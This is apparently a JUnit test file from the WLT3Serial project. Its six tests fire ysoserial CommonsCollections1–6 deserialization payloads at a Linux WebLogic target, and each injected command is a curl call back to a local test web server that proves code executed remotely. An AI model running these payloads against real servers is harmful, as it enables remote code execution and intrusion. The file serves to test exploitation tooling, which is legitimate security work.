/* CommonsCollectionsLinuxTests.java v0.4 (10/23/2018) Test to ensure WLT3Serial performs successful exploitation of Linux target system using various CommonsCollections ysoserial payload types. */ package bort.millipede.wlt3.tests.exploit; import java.io.IOException; import bort.millipede.wlt3.tests.WLT3SerialTestHelper; import bort.millipede.wlt3.tests.WebServerTestHelper; import org.junit.Assert; import org.junit.Before; import org.junit.After; import org.junit.Test; public class CommonsCollectionsLinuxTests { WebServerTestHelper ws; @Before public void setUp() throws IOException { try { ws = new WebServerTestHelper(); } catch(IOException ioe) { throw new IOException("Embedded web server component failed to start!",ioe); } catch(Exception e) { throw e; } } @After public void tearDown() { try { ws.stop(); } catch(Exception e) { //don't care } } @Test public void testAssertLinuxCommonsCollections1() { WLT3SerialTestHelper.checkTargetParams(); String path = ws.createContext(); WLT3SerialTestHelper.runExploit(null,null,"CommonsCollections1","curl http://"+System.getProperty("localhost.ip")+":"+Integer.toString(ws.getPort())+"/"+path); String remoteIP = WLT3SerialTestHelper.getAccessedHost(ws,path); WLT3SerialTestHelper.checkAccessedHost(remoteIP); } @Test public void testAssertLinuxCommonsCollections2() { WLT3SerialTestHelper.checkTargetParams(); String path = ws.createContext(); WLT3SerialTestHelper.runExploit(null,null,"CommonsCollections2","curl http://"+System.getProperty("localhost.ip")+":"+Integer.toString(ws.getPort())+"/"+path); String remoteIP = WLT3SerialTestHelper.getAccessedHost(ws,path); WLT3SerialTestHelper.checkAccessedHost(remoteIP); } @Test public void testAssertLinuxCommonsCollections3() { WLT3SerialTestHelper.checkTargetParams(); String path = ws.createContext(); WLT3SerialTestHelper.runExploit(null,null,"CommonsCollections3","curl http://"+System.getProperty("localhost.ip")+":"+Integer.toString(ws.getPort())+"/"+path); String remoteIP = WLT3SerialTestHelper.getAccessedHost(ws,path); WLT3SerialTestHelper.checkAccessedHost(remoteIP); } @Test public void testAssertLinuxCommonsCollections4() { WLT3SerialTestHelper.checkTargetParams(); String path = ws.createContext(); WLT3SerialTestHelper.runExploit(null,null,"CommonsCollections4","curl http://"+System.getProperty("localhost.ip")+":"+Integer.toString(ws.getPort())+"/"+path); String remoteIP = WLT3SerialTestHelper.getAccessedHost(ws,path); WLT3SerialTestHelper.checkAccessedHost(remoteIP); } @Test public void testAssertLinuxCommonsCollections5() { WLT3SerialTestHelper.checkTargetParams(); String path = ws.createContext(); WLT3SerialTestHelper.runExploit(null,null,"CommonsCollections5","curl http://"+System.getProperty("localhost.ip")+":"+Integer.toString(ws.getPort())+"/"+path); String remoteIP = WLT3SerialTestHelper.getAccessedHost(ws,path); WLT3SerialTestHelper.checkAccessedHost(remoteIP); } @Test public void testAssertLinuxCommonsCollections6() { WLT3SerialTestHelper.checkTargetParams(); String path = ws.createContext(); WLT3SerialTestHelper.runExploit(null,null,"CommonsCollections6","curl http://"+System.getProperty("localhost.ip")+":"+Integer.toString(ws.getPort())+"/"+path); String remoteIP = WLT3SerialTestHelper.getAccessedHost(ws,path); WLT3SerialTestHelper.checkAccessedHost(remoteIP); } }